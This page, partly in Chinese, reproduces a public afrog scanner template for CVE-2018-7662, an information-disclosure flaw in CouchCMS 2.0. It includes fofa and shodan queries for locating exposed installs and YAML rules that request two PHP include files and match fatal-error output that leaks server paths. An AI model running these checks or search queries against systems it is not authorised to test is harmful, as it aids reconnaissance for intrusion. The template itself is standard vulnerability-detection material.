CVE-2018-7662: Couchcms 2.0 Dictionary Disclosure

漏洞描述

Couchcms 2.0 Dictionary Disclosure fofa: app="Couchcms" shodan: http.html:"Couchcms"

PoC代码[已公开]

id: CVE-2018-7662

info:
  name: Couchcms 2.0 Dictionary Disclosure
  author: we1x4n
  severity: medium
  description: |-
    Couchcms 2.0 Dictionary Disclosure
    fofa: app="Couchcms"
    shodan: http.html:"Couchcms"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7662
  tags: cve,cve2018,couchcms,dictionary
  created: 2023/08/10

rules:
  r0:
    request:
      method: GET
      path: /includes/mysql2i/mysql2i.func.php
    expression: 'response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in")'
  r1:
    request:
      method: GET
      path: /addons/phpmailer/phpmailer.php
    expression: 'response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in")'
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2018/CVE-2018-7662.yaml